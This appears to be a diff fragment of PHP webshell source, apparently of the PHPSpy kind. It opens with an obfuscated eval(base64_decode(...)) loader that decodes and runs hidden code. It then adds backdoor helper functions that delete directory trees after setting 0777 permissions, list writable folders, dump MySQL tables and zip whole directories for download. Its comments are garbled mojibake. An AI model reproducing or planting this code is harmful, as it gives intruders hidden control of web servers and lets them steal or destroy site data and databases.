vMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); +// ++| -+-+ +function deltree($deldir) { + $mydir=@dir($deldir); + while($file=$mydir->read()) { + if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { + @chmod($deldir.'/'.$file,0777); + deltree($deldir.'/'.$file); + } + if (is_file($deldir.'/'.$file)) { + @chmod($deldir.'/'.$file,0777); + @unlink($deldir.'/'.$file); + } + } + $mydir->close(); + @chmod($deldir,0777); + return @rmdir($deldir) ? 1 : 0; +} + +// #э+ё--+ф|-#|+#+л|ц++ +function bg() { + global $bgc; + return ($bgc++%2==0) ? 'alt1' : 'alt2'; +} + +// +ё+б|#|#|-+-+ -|-|-++| +function getPath($scriptpath, $nowpath) { + if ($nowpath == '.') { + $nowpath = $scriptpath; + } + $nowpath = str_replace('\\', '/', $nowpath); + $nowpath = str_replace('//', '/', $nowpath); + if (substr($nowpath, -1) != '/') { + $nowpath = $nowpath.'/'; + } + return $nowpath; +} + +// +ё+б|#|#-+-+|-+-+|-+-+ +function getUpPath($nowpath) { + $pathdb = explode('/', $nowpath); + $num = count($pathdb); + if ($num > 2) { + unset($pathdb[$num-1],$pathdb[$num-2]); + } + $uppath = implode('/', $pathdb).'/'; + $uppath = str_replace('//', '/', $uppath); + return $uppath; +} + +// +ь#щPHP+ф+|#+- +function getcfg($varname) { + $result = get_cfg_var($varname); + if ($result == 0) { + return 'No'; + } elseif ($result == 1) { + return 'Yes'; + } else { + return $result; + } +} + +// +ь#щ|п- |щ+Ў +function getfun($funName) { + return (false !== function_exists($funName)) ? 'Yes' : 'No'; +} + +function GetList($dir){ + global $dirdata,$j,$nowpath; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + if (is_writable($f)) { + $dirdata[$j]['filename']=str_replace($nowpath,'',$f); + $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $dirdata[$j]['dirchmod']=getChmod($f); + $dirdata[$j]['dirperm']=getPerms($f); + $dirdata[$j]['dirlink']=ue($dir); + $dirdata[$j]['server_link']=$f; + $dirdata[$j]['client_link']=ue($f); + $j++; + } + GetList($f); + } + } + closedir($dh); + clearstatcache(); + return $dirdata; + } else { + return array(); + } +} + +function qy($sql) { + //echo $sql.'
        '; + $res = $error = ''; + if(!$res = @mysql_query($sql)) { + return 0; + } else if(is_resource($res)) { + return 1; + } else { + return 2; + } + return 0; +} + +function q($sql) { + return @mysql_query($sql); +} + +function fr($qy){ + mysql_free_result($qy); +} + +function sizecount($size) { + if($size > 1073741824) { + $size = round($size / 1073741824 * 100) / 100 . ' G'; + } elseif($size > 1048576) { + $size = round($size / 1048576 * 100) / 100 . ' M'; + } elseif($size > 1024) { + $size = round($size / 1024 * 100) / 100 . ' K'; + } else { + $size = $size . ' B'; + } + return $size; +} + +// -|-ї|Є# +р +class PHPZip{ + var $out=''; + function PHPZip($dir) { + if (@function_exists('gzcompress')) { + $curdir = getcwd(); + if (is_array($dir)) $filelist = $dir; + else{ + $filelist=$this -> GetFileList($dir);//+-+ --#э + foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); + } + if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); + else chdir($curdir); + if (count($filelist)>0){ + foreach($filelist as $filename){ + if (is_file($filename)){ + $fd = fopen ($filename, 'r'); + $content = @fread ($fd, filesize($filename)); + fclose ($fd); + if (is_array($dir)) $filename = basename($filename); + $this -> addFile($content, $filename); + } + } + $this->out = $this -> file(); + chdir($curdir); + } + return 1; + } + else return 0; + } + + // +ё||++|и-+-++-+ --#э + function GetFileList($dir){ + static $a; + if (is_dir($dir)) { + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + if($file!='.' && $file!='..'){ + $f=$dir .'/'. $file; + if(is_dir($f)) $this->GetFileList($f); + $a[]=$f; + } + } + closedir($dh); + } + } + return $a; + } + + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } // end if + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + + function addFile($data, $name, $time = 0) { + $name = str_replace('\\', '/', $name); + + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $c_len = strlen($zdata); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + + $this -> datasec[] = $fr; + $new_offset = strlen(implode('', $this->datasec)); + + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset = $new_offset; + $cdrec .= $name; + + $this -> ctrl_dir[] = $cdrec; + } + + function file() { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; + } +} + +// #++|- +|+т +function sqldumptable($table, $fp=0) { + $tabledump = "DROP TABLE IF EXISTS $table;\n"; + $tabledump .= "CREATE TABLE $table (\n"; + + $firstfield=1; + + $fields = q("SHOW FIELDS FROM $table"); + while ($field = mysql_fetch_array($fields)) { + if (!$firstfield) { + $tabledump .= ",\n"; + } else { + $firstfield=0; + } + $tabledump .= " $field[Field] $field[Type]"; + if (!empty($field["Default"])) { + $tabledump .= " DEFAULT '$field[Default]'"; + } + if ($field['Null'] != "YES") { + $tabledump .= " NOT NULL"; + } + if ($field['Extra'] != "") { + $tabledump .= " $field[Extra]"; + } + } + fr($fields); + + $keys = q("SHOW KEYS FROM $table"); + while ($key = mysql_fetch_array($keys)) { + $kname=$key['Key_name']; + if ($kname != "PRIMARY" && $key['Non_unique'] == 0) { + $kname="UNIQUE|$kname"; + } + if(!is_array($index[$kname])) { + $index[$kname] = array(); + } + $index[$kname][] = $key['Column_name']; + } + fr($keys); + + while(list($kname, $columns) = @each($index)) { + $tabledump .= ",\n"; + $colnames=implode($columns,","); + + if ($kname == "PRIMARY") { + $tabledump .= " PRIMARY KEY ($colnames)"; + } else { + if (substr($kname,0,6) == "UNIQUE") { + $kname=substr($kname,7); + } + $tabledump .= " KEY $kname ($colnames)"; + } + } + + $tabledump .= "\n);\n\n"; + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + + $rows = q("SELECT * FROM $table"); + $numfields = mysql_num_fields($rows); + while ($row = mysql_fetch_array($rows)) { + $tabledump = "INSERT INTO $table VALUES("; + + $fieldcounter=-1; + $firstfield=1; + while (++$fieldcounter<$numfields) { + if (!$firstfield) { + $tabledump.=", "; + } else { + $firstfield=0; + } + + if (!isset($row[$fieldcounter])) { + $tabledump .= "NULL"; + } else { + $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; + } + } + + $tabledump .= ");\n"; + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + fr($rows); + if ($fp) { + fwrite($fp,"\n"); + } else { + echo "\n"; + } +} + +function ue($str){ + return urlencode($str); +} + +function p($str){ + echo $str."\n"; +} + +function tbhead() { + p(''); +} +function tbfoot(){ + p('
        '); +} + +function makehide($name,$value=''){ + p(""); +} + +function makeinput($arg = array()){ + $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; + $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; + !$arg['type'] && $arg['type'] = 'text'; + $arg['title'] = $arg['title'] ? $arg['title'].'
        ' : ''; + $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; + if ($arg['newline']) { + p("

        $arg[title]

        "); + } else { + p("$arg[title]"); + } +} + +function makeselect($arg = array()){ + if ($arg['onchange']) { + $onchange = 'onchange="'.$arg['onchange'].'"'; + } + $arg['title'] = $arg['title'] ? $arg['title'] : ''; + if ($arg['newline']) p('

        '); + p("$arg[title] "); + if ($arg['newline']) p('

        '); +} +function formhead($arg = array()) { + !$arg['method'] && $arg['method'] = 'post'; + !$arg['action'] && $arg['action'] = $self; + $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; + !$arg['name'] && $arg['name'] = 'form1'; + p("
        "); + if ($arg['title']) { + p('

        '.$arg['title'].' »

        '); + } +} + +function maketext($arg = array()){ + !$arg['cols'] && $arg['cols'] = 100; + !$arg['rows'] && $arg['rows'] = 25; + $arg['title'] = $arg['title'] ? $arg['title'].'
        ' : ''; + p("

        $arg[title]

        "); +} + +function formfooter($name = ''){ + !$name && $name = 'submit'; + p('

        '); + p('
        '); +} + +function formfoot(){ + p(''); +} + +// |ў-+|п- +function pr($a) { + echo '
        ';
        +	print_r($a);
        +	echo '
        '; +} + +?> + \ No newline at end of file